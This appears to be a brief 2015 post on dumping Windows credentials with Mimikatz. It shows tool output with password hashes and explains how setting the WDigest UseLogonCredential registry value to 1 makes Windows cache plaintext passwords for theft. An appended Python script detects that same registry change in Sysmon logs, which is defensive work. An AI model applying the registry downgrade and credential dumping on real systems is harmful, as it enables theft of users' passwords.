Mickey | 2015-05-11 11:52
In the default configuration the plaintext password is not cached, so Mimikatz displays the password as (null):
```
Authentication Id : 0 ; 121279 (00000000:0001d9bf)
Session           : Interactive from 1
User Name         : Mickey
Domain            : WIN-B054laoh5fc
Logon Server      : WIN-B054laoh5fc
Logon Time        : 2014/2/7 16:13:37
SID               : S-1-5-21-3697557613-2315859964-140861748-1001
        msv :
         [00000003] Primary
         * Username : Mickey
         * Domain   : WIN-B054laoh5fc
         * NTLM     : 31d6cfe0d16ae931b73c59d7e0c089c0
         * SHA1     : da39a3ee5e6b4b0d3255bfef95601890afd80709
         [00010000] CredentialKeys
         * NTLM     : 31d6cfe0d16ae931b73c59d7e0c089c0
         * SHA1     : da39a3ee5e6b4b0d3255bfef95601890afd80709
        tspkg :
        wdigest :
         * Username : Mickey
         * Domain   : WIN-B054laoh5fc
         * Password : (null)
         :
         * Username : Mickey
         * Domain   : Win-B054LAOH5FC
         * Password : (null)
         : KO
        credman :
```
To change this, the "UseLogonCredential" value under HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest needs to be set to 1, with type DWORD (32-bit). The plaintext password is then recorded the next time the user logs on:
```
Authentication Id : 0 ; 2506062 (00000000:00263d4e)
Session           : Interactive from 2
User Name         : Mickey
Domain            : WIN-B054laoh5fc
Logon Server      : WIN-B054laoh5fc
Logon Time        : 2015/5/11 11:47:35
SID               : S-1-5-21-3697557613-2315859964-140861748-1001
        msv :
         [00010000] CredentialKeys
         * NTLM     : ad12521316a18d2172f20db07674c278
         * SHA1     : 85b6b322a966fe19f758ee15fd7516c23c33cb7c
         [00000003] Primary
         * Username : Mickey
         * Domain   : WIN-B054laoh5fc
         * NTLM     : ad12521316a18d2172f20db07674c278
         * SHA1     : 85b6b322a966fe19f758ee15fd7516c23c33cb7c
        tspkg :
        wdigest :
         * Username : Mickey
         * Domain   : Win-
         * Password : [email protected].
```
Reference Link: http://www.labofapenetrationtester.com/2015/05/dumping-passwords-in-plain-on-windows-8-1.html
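A defender-side check for the registry change described above, as an added example that is not part of the original post: it scans registry value-set events and reports any that set UseLogonCredential to a non-zero value. The sample records are constructed, and the field names (UtcTime, Image, TargetObject, Details) assume the message rendering of Sysmon Event ID 13.

```python
import re

# Constructed records (not from the page), shaped like the rendered message of
# Sysmon Event ID 13 (registry value set). Field names are assumed from Sysmon.
SAMPLE_EVENTS = [
    r"""UtcTime: 2015-05-11 03:40:02.113
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
TargetObject: HKLM\System\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential
Details: DWORD (0x00000001)""",
    r"""UtcTime: 2015-05-11 04:02:10.500
Image: C:\Windows\System32\reg.exe
TargetObject: HKLM\System\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential
Details: DWORD (0x00000000)""",
    r"""UtcTime: 2015-05-11 04:05:44.020
Image: C:\Windows\System32\svchost.exe
TargetObject: HKLM\System\CurrentControlSet\Control\Lsa\LimitBlankPasswordUse
Details: DWORD (0x00000001)""",
]

# Match the value under the live control set or a numbered one (ControlSet001).
WDIGEST_VALUE = re.compile(
    r"^HKLM\\System\\(CurrentControlSet|ControlSet\d{3})"
    r"\\Control\\SecurityProviders\\WDigest\\UseLogonCredential$", re.I)
DWORD = re.compile(r"^DWORD \(0x([0-9a-f]{8})\)$", re.I)

def parse_event(text):
    """Split 'Key: value' lines into a dict (the first ': ' ends the key)."""
    fields = {}
    for line in text.splitlines():
        key, sep, value = line.partition(": ")
        if sep:
            fields[key.strip()] = value.strip()
    return fields

def wdigest_enable_alerts(raw_events):
    """Return one alert per event that sets UseLogonCredential to non-zero."""
    alerts = []
    for event in map(parse_event, raw_events):
        data = DWORD.match(event.get("Details", ""))
        if not WDIGEST_VALUE.match(event.get("TargetObject", "")) or not data:
            continue
        if int(data.group(1), 16) != 0:  # 0 is the hardened setting
            alerts.append({"time": event.get("UtcTime"), "image": event.get("Image")})
    return alerts

if __name__ == "__main__":
    for alert in wdigest_enable_alerts(SAMPLE_EVENTS):
        print("WDigest plaintext caching enabled:", alert)
```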
Method for capturing plaintext passwords on Windows 2012